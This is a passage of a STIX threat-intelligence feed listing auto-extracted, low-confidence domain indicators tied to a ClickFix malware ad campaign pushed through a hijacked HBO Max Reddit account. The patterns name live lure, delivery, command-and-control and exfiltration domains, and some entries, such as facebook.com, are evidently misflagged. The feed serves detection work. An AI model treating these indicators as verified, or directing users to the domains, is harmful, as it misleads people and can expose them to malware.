(Cyber Security News). Context: codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain","pattern":"[domain-name:value = 'clean-disk-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--accb1602-73a4-403f-9045-cd50113f35c6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cli-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: tes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[","pattern":"[domain-name:value = 'cli-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f23c2a84-5107-4d2d-860c-c5e8df943931","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cli-guides.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]c","pattern":"[domain-name:value = 'cli-guides.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e86988da-e2a2-404f-ba2a-135908722714","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cli-stack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-comm","pattern":"[domain-name:value = 'cli-stack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c38db91e-81e8-4f59-a675-7a72dd74ba25","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: clveeragent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cos","pattern":"[domain-name:value = 'clveeragent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b6c671b0-6091-47de-8362-4e73f570e676","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cmux-lab.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; c","pattern":"[domain-name:value = 'cmux-lab.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--facbe6f3-0e5d-491d-8346-def9432ed01c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: code-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: raft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account g","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12f467e0-7b98-4de5-a742-7d429908abe1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: codex-craft.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: nts using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-des","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--44245dca-f837-4ecd-9372-515078893e95","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: codex-notes.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-des","pattern":"[domain-name:value = 'codex-notes.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd2546f4-9e0a-44c1-90e3-44ea5fef2bee","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: codex-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com;","pattern":"[domain-name:value = 'codex-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f21b1c8-8eaf-47d8-a2a4-65c71ae413d8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: congiagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; ce","pattern":"[domain-name:value = 'congiagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--59b91ecc-4bf9-4d39-b8b8-835be0c13e13","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: cosimcagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com;","pattern":"[domain-name:value = 'cosimcagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--341fdff9-ada8-4b10-b89d-376cde3277ff","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: crisp-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: abar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]c","pattern":"[domain-name:value = 'crisp-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e20f8b0a-2e37-40b6-8149-49f5576f8fa5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: denverplumbingandwaterheater.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: vmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellare","pattern":"[domain-name:value = 'denverplumbingandwaterheater.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6f13e106-1ab4-4957-a9c5-9daeee6692df","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: desktop-version.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]","pattern":"[domain-name:value = 'desktop-version.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--16c6d16c-f79f-4b26-b304-6a8845fa661b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: dogtrainersgeorgia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: dscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com;","pattern":"[domain-name:value = 'dogtrainersgeorgia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6184db3c-a064-4c2c-ab04-370495d6c385","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ember-bridge.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--983bfa9c-33c6-4fb7-a992-a3c8eb6c1997","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: facebook.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 3 Amatera direct-to-IP TLS command-and-control server using facebook[.]com SNI IP address 165.22.199[.]85 September macOS telemetry","pattern":"[domain-name:value = 'facebook.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--78f7c763-726f-4463-a7a4-de7012680a7e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: fern-plume.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: y and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov","pattern":"[domain-name:value = 'fern-plume.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55a22057-e2d4-4d9c-9684-24194f9b1e16","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: filequanticore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ss 38.244.158[.]56 AMOS helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbo","pattern":"[domain-name:value = 'filequanticore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8891e381-2d38-49a3-9402-244cdd383115","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: filesiriuscore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: S helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; brigh","pattern":"[domain-name:value = 'filesiriuscore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd304e2d-f071-49b9-a196-18cff81f3035","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: flutelikelurkerunsinewy.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; clean-disk-guide[.]com Copied-command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain","pattern":"[domain-name:value = 'flutelikelurkerunsinewy.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e11aff14-92a7-42ac-840c-9ff972e1d14c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: gatemaden.space","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ntal[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and","pattern":"[domain-name:value = 'gatemaden.space']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0d99a54-3f29-4771-9f70-655d944ae522","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: getnova.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-la","pattern":"[domain-name:value = 'getnova.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--187eb823-cf6a-4ae3-a8a7-4e0c94cbb0d9","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: gigappyworld.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales","pattern":"[domain-name:value = 'gigappyworld.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a87b996-3d44-4cf1-9d76-e8c67f717165","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: glowmedaesthetics.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]","pattern":"[domain-name:value = 'glowmedaesthetics.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--edcf4028-5123-46f1-bfad-d7c469ae5550","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: glrack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com","pattern":"[domain-name:value = 'glrack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bfc61b1c-980f-44cf-b51c-c1bfd657e91f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: gogolfonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: kestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]co","pattern":"[domain-name:value = 'gogolfonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--03e3cd60-7860-4ed0-bab2-aa077e99a8e6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: grove-12.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com","pattern":"[domain-name:value = 'grove-12.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--04bdafc6-bfd5-46b0-8733-ec32172f93b4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: habar55.namebright.bike","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: akenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli","pattern":"[domain-name:value = 'habar55.namebright.bike']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a68c03cd-0521-499e-a571-98d11d6095af","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: harbor-29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; vers","pattern":"[domain-name:value = 'harbor-29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2c3e24c4-a2e9-4a73-8e28-571ee59f82df","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account gave the actors a trusted advert","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--125ce9b2-6dcb-40f2-b806-d8acb9c9e992","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.app","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: blocked. Ads included 40 streaming-themed placements using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e45f4253-3ced-4835-98c8-4412a0805ce7","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbomaxx.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rs run attacker code. The fraudulent landing page hosted at hbomaxx[.]us (Source – HudsonRock) The operators moved quickly as doma","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a468b8df-47ee-4188-9639-88ea5529731b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hbubagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: arbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com;","pattern":"[domain-name:value = 'hbubagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--deda97d4-56cd-4bff-9570-0b0662942780","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: heroestales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]co","pattern":"[domain-name:value = 'heroestales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dee836de-c191-4483-9a66-b956bd1bde34","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: homebrwmac-hub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: adesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-command lure domains Domai","pattern":"[domain-name:value = 'homebrwmac-hub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 